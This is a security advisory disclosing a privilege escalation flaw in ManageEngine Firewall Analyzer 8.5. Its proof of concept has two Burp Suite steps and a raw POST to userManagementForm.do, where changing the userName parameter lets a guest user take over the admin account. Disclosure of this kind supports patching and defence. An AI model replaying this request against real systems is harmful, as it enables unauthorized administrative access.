ManageEngine Firewall Analyzer 8.5 – Privilege Escalation Vulnerability
================================================================
Information
------------------------------------------------
Vulnerability Type : Privilege Escalation Vulnerability
Vulnerable Version : 8.5
Vendor Homepage:
https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author : Sachin Wagh (@tiger_tigerboy)
Description
------------------------------------------------
ManageEngine Firewall Analyzer is agentless log analytics and configuration management software that helps network administrators centrally collect,
archive and analyze their security device logs and generate forensic reports from them.
The user management form (userManagementForm.do) lets an authenticated low-privileged user (the guest account in the proof of concept below) change the account's username and password, allowing the attacker to gain admin privileges.
Proof of Concept URL
--------------------
1. Set up Burp Suite to intercept the change-password request, change the user's password and change the userName parameter to admin.
2. Burp request:
POST /fw/userManagementForm.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost:8500/fw/index2.do?url=archivedFiles&helpP=archivedFiles&completeData=true&tab=system&subTab=cal&flushCache=true&DateRange=false&timeFrame=LastWeek
Cookie: leftPanel=230px; JSESSIONID=E58D08B4F3AF70279BBB128D713EADB7; JSESSIONIDSSO=A326C72CC526B521A8EA9286C7951F0C; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
password=guest&email=guest%40adventnet.com&addField=false&userName=guest&userID=2&changePassword=true&isDemo=false&domainName=&productName=firewall&next=logoff
Affected Product:
------------------------------------------------
Vulnerable Product:
[+] ManageEngine Firewall Analyzer 8.5
Credits & Authors
------------------------------------------------
Sachin Wagh (@tiger_tigerboy)
Thanks